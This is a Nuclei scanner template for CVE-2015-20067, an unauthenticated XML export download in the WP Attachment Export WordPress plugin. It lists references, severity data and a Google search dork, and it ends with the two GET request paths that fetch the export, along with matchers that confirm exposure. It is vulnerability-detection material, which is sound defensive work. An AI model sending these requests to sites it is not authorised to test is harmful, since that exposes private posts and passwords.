nuclei-templates/http/cves/2015/CVE-2015-20067.yaml

48 lines
2.0 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: CVE-2015-20067
info:
name: WP Attachment Export < 0.2.4 - Unrestricted File Download
author: r3Y3r53
severity: high
description: |
The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.
2023-10-17 17:21:59 +00:00
remediation: Fixed in 0.2.4
2023-10-17 07:20:28 +00:00
reference:
- https://wpscan.com/vulnerability/d1a9ed65-baf3-4c85-b077-1f37d8c7793a
- https://packetstormsecurity.com/files/132693/
- https://seclists.org/fulldisclosure/2015/Jul/73
- https://nvd.nist.gov/vuln/detail/CVE-2015-20067
- https://github.com/ARPSyndicate/cvemon
2023-10-17 07:20:28 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-20067
2024-01-30 07:52:58 +00:00
cwe-id: CWE-862
epss-score: 0.07226
epss-percentile: 0.93884
cpe: cpe:2.3:a:wp_attachment_export_project:wp_attachment_export:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 2
vendor: wp_attachment_export_project
product: wp_attachment_export
framework: wordpress
2023-10-17 17:32:04 +00:00
google-query: inurl:"/wp-content/plugins/wp-attachment-export/"
tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export
2023-10-17 07:20:28 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true"
- "{{BaseURL}}/wp-admin/tools.php?content=&wp-attachment-export-download=true"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "text/xml")'
- 'contains_all(body, "title","wp:author_id","wp:author_email")'
condition: and
# digest: 4a0a004730450221009ae41043aeb32a6f0efae515ca649908195bb81ab64c22ce1b473f6e2aead2bd02207348921f089efedaf797358ea22be64048e54ebd476ea7f8af97513b006bf6c1:922c64590222798bb761d5b6d8e72950